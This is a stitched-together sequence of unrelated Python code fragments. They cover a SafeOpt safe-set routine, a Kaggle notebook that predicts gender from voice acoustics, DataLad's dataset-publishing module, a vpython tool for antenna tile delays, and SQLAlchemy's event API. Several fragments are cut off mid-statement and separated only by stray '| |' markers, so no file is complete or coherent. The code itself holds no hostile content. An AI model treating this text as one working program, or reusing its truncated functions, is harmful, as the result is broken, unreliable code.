next_points_arr = np.logical_not(np.logical_or(self.S, self.S_x0))
next_points_indices = np.nonzero(next_points_arr)[0]
delta_S = np.where(
self.last_y - self.R - self.liptschitz[0] * np.linalg.norm(
self.inputs[self.last_x_index] - self.inputs[next_points_indices],
axis=1) >= self.fmin[0], 1,
0)
self.S[next_points_indices] = delta_S
def compute_sets(self, full_sets=False):
"""
Compute the safe set of points, based on current confidence bounds.
Parameters
----------
context: ndarray
Array that contains the context used to compute the sets
full_sets: boolean
Whether to compute the full set of expanders or whether to omit
computations that are not relevant for running SafeOpt
(This option is only useful for plotting purposes)
"""
beta = self.beta(self.t)
# print("Current beta for computing safe set: ", beta)
# Update safe set
self.compute_safe_set()
# Reference to confidence intervals
l, u = self.Q[:, :2].T
if not np.any(self.S):
self.M[:] = False
self.G[:] = False
return
# Set of possible maximisers
# Maximizers: safe upper bound above best, safe lower bound
self.M[:] = False
self.M[self.S] = u[self.S] >= np.max(l[self.S])
max_var = np.max(u[self.M] - l[self.M]) / self.scaling[0]
# Optimistic set of possible expanders
l = self.Q[:, ::2]
u = self.Q[:, 1::2]
self.G[:] = False
# For the run of the algorithm we do not need to calculate the
# full set of potential expanders:
# We can skip the ones already in M and ones that have lower
# variance than the maximum variance in M, max_var or the threshold.
# Amongst the remaining ones we only need to find the
# potential expander with maximum variance
if full_sets:
s = self.S
else:
# skip points in M, they will already be evaluated
s = np.logical_and(self.S, ~self.M)
# Remove points with a variance that is too small
s[s] = (np.max((u[s, :] - l[s, :]) / self.scaling, axis=1) >
max_var)
s[s] = np.any(u[s, :] - l[s, :] > self.threshold * beta, axis=1)
if not np.any(s):
# no need to evaluate any points as expanders in G, exit
return
def sort_generator(array):
"""Return the sorted array, largest element first."""
return array.argsort()[::-1]
# set of safe expanders
G_safe = np.zeros(np.count_nonzero(s), dtype=np.bool)
if not full_sets:
# Sort, element with largest variance first
sort_index = sort_generator(np.max(u[s, :] - l[s, :],
axis=1))
else:
# Sort index is just an enumeration of all safe states
sort_index = range(len(G_safe))
for index in sort_index:
if self.use_lipschitz:
# Distance between current index point and all other unsafe
# points
d = cdist(self.inputs[s, :][[index], :],
self.inputs[~self.S, :])
# Check if expander for all GPs
for i in range(len(self.gps)):
# Skip evaluation if 'no' safety constraint
if self.fmin[i] == -np.inf:
continue
# Safety: u - L * d >= fmin
G_safe[index] = | |
#!/usr/bin/env python
# coding: utf-8
# # Gender Recognition by Voice Kaggle [ Test Accuracy : 99.08 % ]
# In[ ]:
# ## CONTENTS::
# [ **1 ) Importing Various Modules and Loading the Dataset**](#content1)
# [ **2 ) Exploratory Data Analysis (EDA)**](#content2)
# [ **3 ) OutlierTreatment**](#content3)
# [ **4 ) Feature Engineering**](#content4)
# [ **5 ) Preparing the Data**](#content5)
# [ **6 ) Modelling**](#content6)
# [ **7 ) Parameter Tuning with GridSearchCV**](#content7)
# In[ ]:
# ## 1.1 ) Importing Various Modules
# In[ ]:
# Ignore the warnings
import warnings
warnings.filterwarnings('always')
warnings.filterwarnings('ignore')
# data visualisation and manipulation
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import style
import seaborn as sns
import missingno as msno
#configure
# sets matplotlib to inline and displays graphs below the corressponding cell.
style.use('fivethirtyeight')
sns.set(style='whitegrid',color_codes=True)
#import the necessary modelling algos.
from sklearn.linear_model import LogisticRegression
from sklearn.svm import LinearSVC
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn import datasets
from sklearn.naive_bayes import GaussianNB
#model selection
from sklearn.model_selection import train_test_split
from sklearn.model_selection import KFold
from sklearn.metrics import accuracy_score,precision_score,recall_score,confusion_matrix,roc_curve,roc_auc_score
from sklearn.model_selection import GridSearchCV
#preprocess.
from sklearn.preprocessing import MinMaxScaler,StandardScaler,Imputer,LabelEncoder,OneHotEncoder
# ## 1.2 ) Loading the Dataset
# In[ ]:
train=pd.read_csv(r"../../../input/primaryobjects_voicegender/voice.csv")
# In[ ]:
train.head(10)
# <a id="content2"></a>
# ## 2 ) Exploratory Data Analysis (EDA)
# ## 2.1 ) The Features and the 'Target' variable
# In[ ]:
df=train.copy()
# In[ ]:
df.head(10)
# In[ ]:
df.shape
# In[ ]:
df.index
# In[ ]:
df.columns # give a short description of each feature.
# **#A short description as on 'Data' tab on kaggle is :**
# ####
#
# **meanfreq**: mean frequency (in kHz)
#
# **sd**: standard deviation of frequency
#
# **median**: median frequency (in kHz)
#
# **Q25**: first quantile (in kHz)
#
# **Q75**: third quantile (in kHz)
#
# **IQR**: interquantile range (in kHz)
#
# **skew**: skewness (see note in specprop description)
#
# **kurt**: kurtosis (see note in specprop description)
#
# **sp.ent**: spectral entropy
#
# **sfm**: spectral flatness
#
# **mode**: mode frequency
#
# **centroid**: frequency centroid (see specprop)
#
# **peakf**: peak frequency (frequency with highest energy)
#
# **meanfun**: average of fundamental frequency measured across acoustic signal
#
# **minfun**: minimum fundamental frequency measured across acoustic signal
#
# **maxfun**: maximum fundamental frequency measured across acoustic signal
#
# **meandom**: average of dominant frequency measured across acoustic signal
#
# **mindom**: minimum of dominant frequency measured across acoustic signal
#
# **maxdom**: maximum of dominant frequency measured across acoustic signal
#
# **dfrange**: range of dominant frequency measured across acoustic signal
#
# **modindx**: modulation index. Calculated as the accumulated absolute difference between adjacent measurements of fundamental frequencies divided by the frequency range
#
# **label**: male or female
# #### Note that we have 3168 voice samples and for each of sample 20 different acoustic properties are recorded. Finally the 'label' column is the target variable which we have to predict which is the gender of the person.
# ## 2.2 ) Missing Values Treatment
# In[ ]:
# check for null values.
df.isnull().any()
# In[ ]:
msno.matrix(df) # just to visualize. no missing value.
# ## 2.3 ) Univariate Analysis
# In this section I have performed the univariate analysis. Note that since all of the features are 'numeric' the most reasonable way to plot them would either be a 'histogram' or a 'boxplot'.
#
# Also note that univariate analysis is useful for outlier detection. Hence besides plotting a boxplot and a histogram for each column or feature, I have written a small utility function which tells the remaining no of observations for each feature if we remove its outliers.
# #### To detect the outliers I have used the standard 1.5 InterQuartileRange (IQR) rule which states that any observation lesser than 'first quartile - 1.5 IQR' or greater than 'third quartile +1.5 IQR' is an outlier.
# In[ ]:
df.describe()
# In[ ]:
def calc_limits(feature):
q1,q3=df[feature].quantile([0.25,0.75])
iqr=q3-q1
rang=1.5*iqr
return(q1-rang,q3+rang)
# In[ ]:
def plot(feature):
fig,axes=plt.subplots(1,2)
sns.boxplot(data=df,x=feature,ax=axes[0])
sns.distplot(a=df[feature],ax=axes[1],color='#ff4125')
fig.set_size_inches(15,5)
lower,upper = calc_limits(feature)
l=[df[feature] for i in df[feature] if i>lower and i<upper]
print("Number of data points remaining if outliers removed : ",len(l))
# In[ ]:
plot('meanfreq')
# #### INFERENCES FROM THE PLOT--
#
# 1) First of all note that the values are in compliance with that observed from describe method data frame..
#
# 2) Note that we have a couple of outliers w.r.t. to 1.5 quartile rule (reprsented by a 'dot' in the box plot).Removing these data points or outliers leaves us with around 3104 values.
#
# 3) Also note from the distplot that the distribution seems to be a bit -ve skewed hence we can normalize to make the distribution a bit more symmetric.
#
# 4) LASTLY NOTE THAT A LEFT TAIL DISTRIBUTION HAS MORE OUTLIERS ON THE SIDE BELOW TO Q1 AS EXPECTED AND A RIGHT TAIL HAS ABOVE THE Q3.
# #### Similar other plots can be inferenced.
# In[ ]:
plot('sd')
# In[ ]:
plot('median')
# In[ ]:
plot('Q25')
# In[ ]:
plot('IQR')
# In[ ]:
plot('skew')
# In[ ]:
plot('kurt')
# In[ ]:
plot('sp.ent')
# In[ ]:
plot('sfm')
# In[ ]:
plot('meanfun')
# In[ ]:
sns.countplot(data=df,x='label')
# In[ ]:
df['label'].value_counts()
# #### Note that we have equal no of observations for the 'males' and the 'females'. Hence it is a balanced class problem.
# ## 2.4 ) Bivariate Analysis
# ## 2.4.1 ) Corealtion b/w Features
# In this section I have analyzed the corelation between different features. To do it I have plotted a 'heat map' which clearly visulizes the corelation between different features.
# In[ ]:
temp = []
for i in df.label:
if i == 'male':
temp.append(1)
else:
temp.append(0)
df['label'] = temp
# In[ ]:
#corelation matrix.
cor_mat= df[:].corr()
mask = np.array(cor_mat)
mask[np.tril_indices_from(mask)] = False
fig=plt.gcf()
fig.set_size_inches(30,12)
# #### SOME INFERENCES FROM THE ABOVE HEATMAP--
#
# 1) Mean frequency is moderately related to label.
#
# 2) IQR and label tend to have a strong positive corelation.
#
# 3) Spectral entropy is also quite highly corelated with the label while sfm is moderately related with label.
#
# 4) skewness and kurtosis aren't much related with label.
#
# 5) meanfun is highly negatively corelated with the label.
#
# 6) Centroid and median have a high positive corelationas expected from their formulae.
#
# 7) ALSO NOTE THAT MEANFREQ AND CENTROID ARE EXACTLY SAME FEATURES AS PER FORMULAE AND VALUES ALSO. HENCE THEIR CORELATION IS PERFCET 1. IN THAT CASE WE CAN DROP ANY COLUMN. note that centroid in general has a high degree of corelation with most of the other features.
#
# SO I WILL DROP THE 'CENTROID' COLUMN.
#
# 8) sd is highly positively related to sfm and so is sp.ent to sd.
#
# 9) kurt and skew are also highly corelated.
#
# 10) meanfreq is highly related to medaina s well as Q25.
#
# 11) IQR is highly corelated to sd.
#
# 12) Finally self relation ie of a feature to itself is equal to 1 as expected.
# #### Note that we can drop some highly corelated features as they add redundancy to the model but let us keep all the features for now. In case of highly corelated features we can use dimensionality reduction techniques like Principal Component Analysis(PCA) to reduce our feature space.
# In[ ]:
df.drop('centroid',axis=1,inplace=True)
# ## 2.4.2 ) Plotting the Features against the 'Target' variable
# Here I have just written a small utility function that plots the 'label' column vs the provided feature on a boxplot. In this way I have plotted some of the features against our target variable. This makes it easier to see the effect of the corressponding feature on the 'label'.
# In[ ]:
# drawing features against the target variable.
def plot_against_target(feature):
sns.factorplot(data=df,y=feature,x='label',kind='box')
fig=plt.gcf()
fig.set_size_inches(7,7)
# In[ ]:
plot_against_target('meanfreq') # 0 for females and 1 for males.
# #### INFERENCES--
#
# 1) Firstly note that 0->'female' and 1->'male'.
#
# 2) Note that the boxpot depicts that the females in genral have higher mean frequencies than their male counterparts and which is a generally accepted fact.
# #### Again similar inferences can be drawn.
# In[ ]:
plot_against_target('sd')
# In[ ]:
plot_against_target('median')
# In[ ]:
plot_against_target('Q25')
# In[ ]:
plot_against_target('IQR')
# #### Note here that there is a remarkable difference b/w the inter quartile ranges of males and females.This is evident from the strong relation between 'label' and the 'IQR' in the heatmap plotted above.
# In[ ]:
plot_against_target('sp.ent')
# In[ ]:
plot_against_target('sfm')
# In[ ]:
plot_against_target('meanfun')
# #### Again high difference in females and males mean fundamental frequency. This | |
<gh_stars>0
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""High-level interface for dataset (component) publishing
"""
import logging
import re
from collections import OrderedDict
from os.path import curdir
from os.path import sep as dirsep
from datalad.interface.base import Interface
from datalad.interface.base import build_doc
from datalad.interface.utils import filter_unmodified
from datalad.interface.common_opts import annex_copy_opts, recursion_flag, \
recursion_limit, git_opts, annex_opts, jobs_opt
from datalad.interface.common_opts import missing_sibling_opt
from datalad.support.param import Parameter
from datalad.support.constraints import EnsureStr
from datalad.support.constraints import EnsureNone
from datalad.support.annexrepo import AnnexRepo
from datalad.support.exceptions import InsufficientArgumentsError
from datalad.support.exceptions import CommandError
from datalad.utils import assure_list
from datalad.dochelpers import exc_str
from .dataset import EnsureDataset
from .dataset import Dataset
from .dataset import datasetmethod
from .dataset import require_dataset
__docformat__ = 'restructuredtext'
lgr = logging.getLogger('datalad.distribution.publish')
# TODO: make consistent configurable output
def _log_push_info(pi_list, log_nothing=True):
from git.remote import PushInfo as PI
error = False
if pi_list:
for push_info in pi_list:
if (push_info.flags & PI.ERROR) == PI.ERROR:
lgr.debug('Push failed: %s', push_info.summary)
error = True
else:
lgr.debug('Pushed: %s', push_info.summary)
else:
if log_nothing:
lgr.debug("Pushed: nothing")
return error
def _publish_dataset(ds, remote, refspec, paths, annex_copy_options, force=False, jobs=None):
# TODO: this setup is now quite ugly. The only way `refspec` can come
# in, is when there is a tracking branch, and we get its state via
# `refspec`
is_annex_repo = isinstance(ds.repo, AnnexRepo)
def _publish_data():
if ds.repo.is_remote_annex_ignored(remote):
return [], [] # Cannot publish any data
try:
remote_wanted = ds.repo.get_preferred_content('wanted', remote)
except CommandError as exc:
if "cannot determine uuid" in str(exc):
if not ds.repo.is_remote_annex_ignored(remote):
lgr.warning(
"Annex failed to determine UUID, skipping publishing data for now: %s",
exc_str(exc)
)
return [], []
raise
if (paths or annex_copy_options or remote_wanted) and is_annex_repo:
lgr.info("Publishing {0} data to {1}".format(ds, remote))
# overwrite URL with pushurl if any, reason:
# https://git-annex.branchable.com/bugs/annex_ignores_pushurl_and_uses_only_url_upon___34__copy_--to__34__/
# Note: This shouldn't happen anymore with newly added siblings.
# But for now check for it, until we agree on how to fix existing
# ones.
pushurl = ds.config.get('remote.{}.pushurl'.format(remote), None)
annexurl = ds.config.get('remote.{}.annexurl'.format(remote), None)
annex_copy_options_ = annex_copy_options or ''
if pushurl and not annexurl:
annex_copy_options_ += ' -c "remote.{}.annexurl={}"'.format(remote, pushurl)
if not paths and remote_wanted:
lgr.debug("Invoking copy --auto")
annex_copy_options_ += ' --auto'
# TODO: we might need additional logic comparing the state of git-annex
# branch locally and on remote to see if information about the 'copy'
# was also reflected on the remote end
#git_annex_hexsha = ds.repo.get_hexsha('git-annex')
# TODO: must be the same if we merged/pushed before, if not -- skip
# special logic may be with a warning
if not force:
# if we force, we do not trust local knowledge and do the checks
annex_copy_options_ += ' --fast'
pblshd = ds.repo.copy_to(
files=paths,
remote=remote,
options=annex_copy_options_,
jobs=jobs
)
# if ds.submodules:
# # NOTE: we might need to init them on the remote, but needs to
# # be done only if remote is sshurl and it is not bare there
# # (which I think we do not even support ATM)...
# # or we could do that in the hook, as it is done for now
# # (see create_sibling.py)
# #
# pass
# if ds.repo.get_hexsha('git-annex') != git_annex_hexsha:
# # there were changes which should be pushed
# lgr.debug(
# "We have progressed git-annex branch should fetch/merge/push it to %s again",
# remote)
# ds.repo.fetch(remote=remote, refspec='git-annex')
# ds.repo.merge_annex(remote)
# _log_push_info(ds.repo.push(remote=remote, refspec=['git-annex']))
return pblshd
else:
return []
# Plan:
# 1. Check if there is anything to push, and if so
# 2. process push dependencies
# 3. fetch and merge annex branch
# 4. push non-annex branch(es)
# 5. copy data to the remote if paths are provided or it wants something generally
published, skipped = [], []
# upstream refspec needed for update (merge) and subsequent push,
# in case there is no.
# no tracking refspec yet?
if force:
# if forced -- we push regardless if there are differences or not
diff = True
# check if there are any differences wrt the to-be-published paths,
# and if not skip this dataset
else:
if refspec:
remote_branch_name = refspec[11:] \
if refspec.startswith('refs/heads/') \
else refspec
else:
# there was no tracking branch, check the push target
remote_branch_name = ds.repo.get_active_branch()
diff = _get_remote_diff(ds, paths, None, remote, remote_branch_name)
# We might have got new information in git-annex branch although no other
# changes
if not diff and is_annex_repo:
try:
git_annex_commit = next(ds.repo.get_branch_commits('git-annex'))
except StopIteration:
git_annex_commit = None
diff = _get_remote_diff(ds, [], git_annex_commit, remote, 'git-annex')
if diff:
lgr.info("Will publish updated git-annex")
# # remote might be set to be ignored by annex, or we might not even know yet its uuid
# annex_ignore = ds.config.getbool('remote.{}.annex-ignore'.format(remote), None)
# annex_uuid = ds.config.get('remote.{}.annex-uuid'.format(remote), None)
# if not annex_ignore:
# if annex_uuid is None:
# # most probably not yet 'known' and might require some annex
knew_remote_uuid = None
if is_annex_repo and not ds.repo.is_remote_annex_ignored(remote):
try:
ds.repo.get_preferred_content('wanted', remote) # could be just checking config.remote.uuid
knew_remote_uuid = True
except CommandError:
knew_remote_uuid = False
if knew_remote_uuid:
# we can try publishing right away
published += _publish_data()
if not diff:
lgr.debug("No changes detected with respect to state of '%s'", remote)
# there could still be paths to be copied
else:
# publishing of `remote` might depend on publishing other
# remote(s) first:
# define config var name for potential publication dependencies
depvar = 'remote.{}.datalad-publish-depends'.format(remote)
for d in assure_list(ds.config.get(depvar, [])):
lgr.info("Dependency detected: '%s'" % d)
# call this again to take care of the dependency first,
# but keep the paths the same, as the goal is to publish those
# to the primary remote, and not anything elase to a dependency
pblsh, skp = _publish_dataset(
ds,
d,
None,
paths,
annex_copy_options,
force=force,
jobs=jobs
)
published.extend(pblsh)
skipped.extend(skp)
if is_annex_repo and \
ds.repo.is_special_annex_remote(remote):
# There is nothing else to "publish"
lgr.debug(
"{0} is a special annex remote, no git push is needed".format(remote)
)
return published, skipped
lgr.info("Publishing {0} to {1}".format(ds, remote))
# in order to be able to use git's config to determine what to push,
# we need to annex merge first. Otherwise a git push might be
# rejected if involving all matching branches for example.
# Once at it, also push the annex branch right here.
if is_annex_repo:
lgr.debug("Obtain remote annex info from '%s'", remote)
ds.repo.fetch(remote=remote)
ds.repo.merge_annex(remote)
# Note: git's push.default is 'matching', which doesn't work for first
# time publication (a branch, that doesn't exist on remote yet)
# But if we want to respect remote.*.push entries, etc. we need to
# not pass a specific refspec (like active branch) to `git push`
# by default.
# hence we amend any existing config on the fly
# TODO: what else to push by default?
# consider also: --follow-tags, --tags, --atomic
# make sure we push
things2push = []
current_branch = ds.repo.get_active_branch()
if current_branch: # possibly make this conditional on a switch
# TODO: this should become it own helper
if is_annex_repo:
# annex could manage this branch
if current_branch.startswith('annex/direct') \
and ds.config.getbool('annex', 'direct', default=False):
# this is a "fake" annex direct mode branch
# we want to publish the underlying branch
current_branch = current_branch[12:]
match_adjusted = re.match(
'adjusted/(.*)\([a-z]*\)',
current_branch)
if match_adjusted:
# adjusted/master(...)
# TODO: this code is not tested
# see https://codecov.io/gh/datalad/datalad/src/17e67045a088ae0372b38aa4d8d46ecf7c821cb7/datalad/distribution/publish.py#L156
# and thus probably broken -- test me!
current_branch = match_adjusted.group(1)
things2push.append(current_branch)
if is_annex_repo:
things2push.append('git-annex')
# check that all our magic found valid branches
things2push = [t for t in things2push if t in ds.repo.get_branches()]
# check that we don't ask to push things that are already configured
# -> would cause error
# TODO need to find a way to properly do this, when wildcards are used
# in the push configuration variable
things2push = [t for | |
= vpython.rotate(north, angle=(el * math.pi / 180.0),
axis=v(1, 0, 0)) # Rotate up (around E/W axis) by 'el' degrees
pvector = vpython.rotate(t1, angle=(-az * math.pi / 180.0),
axis=v(0, 0, 1)) # Rotate clockwise by 'az' degrees around 'up' axis
parrow = vpython.arrow(pos=v(0, 0, 0), axis=pvector, color=color.yellow, length=20.0, shaftwidth=1.0, visible=True)
ilist = []
alist = []
dlist = []
for bfid in pointing.HEXD:
for dipid in pointing.HEXD:
# Arrow lengths are negative if delays are positive, and vice/versa
if delays:
idealdelay = delays[bfid][dipid] * pointing.C
ilist.append(vpython.arrow(pos=v(*offsets[bfid][dipid]),
axis=pvector,
length=-idealdelay,
color=color.white,
shaftwidth=0.2,
visible=ivis))
if idelays[bfid][dipid] != 16: # If this dipole isn't disabled
actualdelay = ((idelays[bfid][dipid] * pointing.MSTEP) + (idelays['K'][bfid] * pointing.KSTEP)) * pointing.C
alist.append(vpython.arrow(pos=v(*offsets[bfid][dipid]),
axis=pvector,
length=-actualdelay,
color=color.green,
shaftwidth=0.2,
visible=avis))
delaydifference = idealdelay - actualdelay
dlist.append(vpython.arrow(pos=v(*offsets[bfid][dipid]),
axis=pvector,
length=100 * delaydifference,
color=color.red,
shaftwidth=0.2,
visible=dvis))
return parrow, ilist, alist, dlist
def get_sweet_delays(az=0.0, el=0.0, maxsigma=None):
"""
(Written by <NAME>, copied with minor changes from single_observation.py)
Returns the grid pointing that is closest to the requested position (az,el) in degrees
along with the distance to that point. In addition, filtering can be done on the "sigma" column
with a maximum allowed value specified.
:param az: target Az (deg)
:param el: target El (deg)
:param maxsigma: maximum sigma or None
:return: azimuth, elevation, delays
"""
closest = None
# in degrees
closest_distance = 180
for g in GRID_POINTS:
number, azimuth, elevation, sigma, delays = g
if (maxsigma is None or sigma <= maxsigma):
x1 = math.cos(az * math.pi / 180.0) * math.cos(el * math.pi / 180.0)
y1 = math.sin(az * math.pi / 180.0) * math.cos(el * math.pi / 180.0)
z1 = math.sin(el * math.pi / 180.0)
x2 = math.cos(azimuth * math.pi / 180.0) * math.cos(elevation * math.pi / 180.0)
y2 = math.sin(azimuth * math.pi / 180.0) * math.cos(elevation * math.pi / 180.0)
z2 = math.sin(elevation * math.pi / 180.0)
arg = x1 * x2 + y1 * y2 + z1 * z2
if (arg > 1):
arg = 1
if (arg < -1):
arg = -1
theta = math.acos(arg) * 180.0 / math.pi
if (theta < closest_distance):
closest_distance = theta
closest = g
if (closest is None):
if (maxsigma is None):
print('No grid pointings matched')
else:
print('No grid pointings matched grid with maxsigma=%.1e' % maxsigma)
return None, None, None
number, azimuth, elevation, sigma, delays = closest
return azimuth, elevation, delays
def gettiledelays(cpos=None, az=0.0, el=90.0):
"""
Copied from function calc_delays in obssched/pycontroller.py, with
code to create the actual arrow objects added. If cpos is given, it's
used as the tile centre position - use this when showing more than one
tile.
Algorithm copied from ObsController.java and converted to Python
This function takes in an azimuth and zenith angle as
inputs and creates and returns a 16-element byte array for
delayswitches which have values corresponding to each
dipole in the tile having a maximal coherent amplitude in the
desired direction.
This will return null if the inputs are
out of physical range (if za is bigger than 90) or
if the calculated switches for the dipoles are out
of range of the delaylines in the beamformer.
azimuth of 0 is north and it increases clockwise
zenith angle is the angle down from zenith
These angles should be given in degrees
Layout of the dipoles on the tile:
N
0 1 2 3
4 5 6 7
W E
8 9 10 11
12 13 14 15
S
"""
if cpos is None:
cpos = v(0, 0, 0)
elif type(cpos) == tuple:
cpos = v(cpos)
# Find the delay values for the nearest sweetspot, to use for green arrows:
sweetaz, sweetel, sweetdelays = get_sweet_delays(az=az, el=el)
# Calculate the geometric delays for the ax/el given, without using sweetspot
dip_sep = 1.10 # dipole separations in meters
delaystep = 435.0 # Delay line increment in picoseconds
maxdelay = 31 # Maximum number of deltastep delays
c = 0.000299798 # C in meters/picosecond
dtor = math.pi / 180.0 # convert degrees to radians
# define zenith angle
za = 90 - el
# Define arrays to hold the positional offsets of the dipoles
xoffsets = [0.0] * 16 # offsets of the dipoles in the W-E 'x' direction
yoffsets = [0.0] * 16 # offsets of the dipoles in the S-N 'y' direction
delays = [0.0] * 16 # The calculated delays in picoseconds
rdelays = [0] * 16 # The rounded delays in units of delaystep
delaysettings = [0] * 16 # return values
# Check input sanity
if (abs(za) > 90):
return None
# Offsets of the dipoles are calculated relative to the
# center of the tile, with positive values being in the north
# and east directions
xoffsets[0] = -1.5 * dip_sep
xoffsets[1] = -0.5 * dip_sep
xoffsets[2] = 0.5 * dip_sep
xoffsets[3] = 1.5 * dip_sep
xoffsets[4] = -1.5 * dip_sep
xoffsets[5] = -0.5 * dip_sep
xoffsets[6] = 0.5 * dip_sep
xoffsets[7] = 1.5 * dip_sep
xoffsets[8] = -1.5 * dip_sep
xoffsets[9] = -0.5 * dip_sep
xoffsets[10] = 0.5 * dip_sep
xoffsets[11] = 1.5 * dip_sep
xoffsets[12] = -1.5 * dip_sep
xoffsets[13] = -0.5 * dip_sep
xoffsets[14] = 0.5 * dip_sep
xoffsets[15] = 1.5 * dip_sep
yoffsets[0] = 1.5 * dip_sep
yoffsets[1] = 1.5 * dip_sep
yoffsets[2] = 1.5 * dip_sep
yoffsets[3] = 1.5 * dip_sep
yoffsets[4] = 0.5 * dip_sep
yoffsets[5] = 0.5 * dip_sep
yoffsets[6] = 0.5 * dip_sep
yoffsets[7] = 0.5 * dip_sep
yoffsets[8] = -0.5 * dip_sep
yoffsets[9] = -0.5 * dip_sep
yoffsets[10] = -0.5 * dip_sep
yoffsets[11] = -0.5 * dip_sep
yoffsets[12] = -1.5 * dip_sep
yoffsets[13] = -1.5 * dip_sep
yoffsets[14] = -1.5 * dip_sep
yoffsets[15] = -1.5 * dip_sep
# First, figure out the theoretical delays to the dipoles
# relative to the center of the tile
# Convert to radians
azr = az * dtor
zar = za * dtor
for i in range(16):
# calculate exact delays in picoseconds from geometry...
delays[i] = (xoffsets[i] * math.sin(azr) + yoffsets[i] * math.cos(azr)) * math.sin(zar) / c
# Find minimum delay
mindelay = min(delays)
# Subtract minimum delay so that all delays are positive
for i in range(16):
delays[i] -= mindelay
# Now minimize the sum of the deviations^2 from optimal
# due to errors introduced when rounding the delays.
# This is done by stepping through a series of offsets to
# see how the sum of square deviations changes
# and then selecting the delays corresponding to the min sq dev.
# Go through once to get baseline values to compare
bestoffset = -0.45 * delaystep
minsqdev = 0
for i in range(16):
delay_off = delays[i] + bestoffset
intdel = int(round(delay_off / delaystep))
if (intdel > maxdelay):
intdel = maxdelay
minsqdev += math.pow((intdel * delaystep - delay_off), 2)
minsqdev = minsqdev / 16
offset = (-0.45 * delaystep) + (delaystep / 20.0)
while offset <= (0.45 * delaystep):
sqdev = 0
for i in range(16):
delay_off = delays[i] + offset
intdel = int(round(delay_off / delaystep))
if (intdel > maxdelay):
intdel = maxdelay
sqdev = sqdev + math.pow((intdel * delaystep - delay_off), 2)
sqdev = sqdev / 16
if (sqdev < minsqdev):
minsqdev = sqdev
bestoffset = offset
offset += delaystep / 20.0
for i in range(16):
rdelays[i] = int(round((delays[i] + bestoffset) / delaystep))
if (rdelays[i] > maxdelay):
if (rdelays[i] > maxdelay + 1):
return None # Trying to steer out of range.
rdelays[i] = maxdelay
# Set the actual delays
for i in range(16):
delaysettings[i] = int(rdelays[i])
if mode == 'EDA':
parrowlen = 20.0
parrowsw = 1.0
else:
parrowlen = 5.0
parrowsw = 0.2
north = v(0, 1, 0) # Due north, elevation 0 degrees
at1 = vpython.rotate(north, angle=(el * math.pi / 180),
axis=v(1, 0, 0)) # Rotate up (around E/W axis) by 'el' degrees
apvector = vpython.rotate(at1, angle=(-az * math.pi / 180),
| |
# sqlalchemy/event.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Base event API."""
from . import util, exc
from itertools import chain
import weakref
CANCEL = util.symbol('CANCEL')
NO_RETVAL = util.symbol('NO_RETVAL')
def listen(target, identifier, fn, *args, **kw):
"""Register a listener function for the given target.
e.g.::
from sqlalchemy import event
from sqlalchemy.schema import UniqueConstraint
def unique_constraint_name(const, table):
const.name = "uq_%s_%s" % (
table.name,
list(const.columns)[0].name
)
event.listen(
UniqueConstraint,
"after_parent_attach",
unique_constraint_name)
"""
for evt_cls in _registrars[identifier]:
tgt = evt_cls._accept_with(target)
if tgt is not None:
tgt.dispatch._listen(tgt, identifier, fn, *args, **kw)
return
raise exc.InvalidRequestError("No such event '%s' for target '%s'" %
(identifier, target))
def listens_for(target, identifier, *args, **kw):
"""Decorate a function as a listener for the given target + identifier.
e.g.::
from sqlalchemy import event
from sqlalchemy.schema import UniqueConstraint
@event.listens_for(UniqueConstraint, "after_parent_attach")
def unique_constraint_name(const, table):
const.name = "uq_%s_%s" % (
table.name,
list(const.columns)[0].name
)
"""
def decorate(fn):
listen(target, identifier, fn, *args, **kw)
return fn
return decorate
def remove(target, identifier, fn):
"""Remove an event listener.
Note that some event removals, particularly for those event dispatchers
which create wrapper functions and secondary even listeners, may not yet
be supported.
"""
for evt_cls in _registrars[identifier]:
for tgt in evt_cls._accept_with(target):
tgt.dispatch._remove(identifier, tgt, fn)
return
_registrars = util.defaultdict(list)
def _is_event_name(name):
return not name.startswith('_') and name != 'dispatch'
class _UnpickleDispatch(object):
"""Serializable callable that re-generates an instance of
:class:`_Dispatch` given a particular :class:`.Events` subclass.
"""
def __call__(self, _parent_cls):
for cls in _parent_cls.__mro__:
if 'dispatch' in cls.__dict__:
return cls.__dict__['dispatch'].dispatch_cls(_parent_cls)
else:
raise AttributeError("No class with a 'dispatch' member present.")
class _Dispatch(object):
"""Mirror the event listening definitions of an Events class with
listener collections.
Classes which define a "dispatch" member will return a
non-instantiated :class:`._Dispatch` subclass when the member
is accessed at the class level. When the "dispatch" member is
accessed at the instance level of its owner, an instance
of the :class:`._Dispatch` class is returned.
A :class:`._Dispatch` class is generated for each :class:`.Events`
class defined, by the :func:`._create_dispatcher_class` function.
The original :class:`.Events` classes remain untouched.
This decouples the construction of :class:`.Events` subclasses from
the implementation used by the event internals, and allows
inspecting tools like Sphinx to work in an unsurprising
way against the public API.
"""
def __init__(self, _parent_cls):
self._parent_cls = _parent_cls
def _join(self, other):
"""Create a 'join' of this :class:`._Dispatch` and another.
This new dispatcher will dispatch events to both
:class:`._Dispatch` objects.
Once constructed, the joined dispatch will respond to new events
added to this dispatcher, but may not be aware of events
added to the other dispatcher after creation of the join. This is
currently for performance reasons so that both dispatchers need
not be "evaluated" fully on each call.
"""
if '_joined_dispatch_cls' not in self.__class__.__dict__:
cls = type(
"Joined%s" % self.__class__.__name__,
(_JoinedDispatcher, self.__class__), {}
)
for ls in _event_descriptors(self):
setattr(cls, ls.name, _JoinedDispatchDescriptor(ls.name))
self.__class__._joined_dispatch_cls = cls
return self._joined_dispatch_cls(self, other)
def __reduce__(self):
return _UnpickleDispatch(), (self._parent_cls, )
def _update(self, other, only_propagate=True):
"""Populate from the listeners in another :class:`_Dispatch`
object."""
for ls in _event_descriptors(other):
getattr(self, ls.name).\
for_modify(self)._update(ls, only_propagate=only_propagate)
@util.hybridmethod
def _clear(self):
for attr in dir(self):
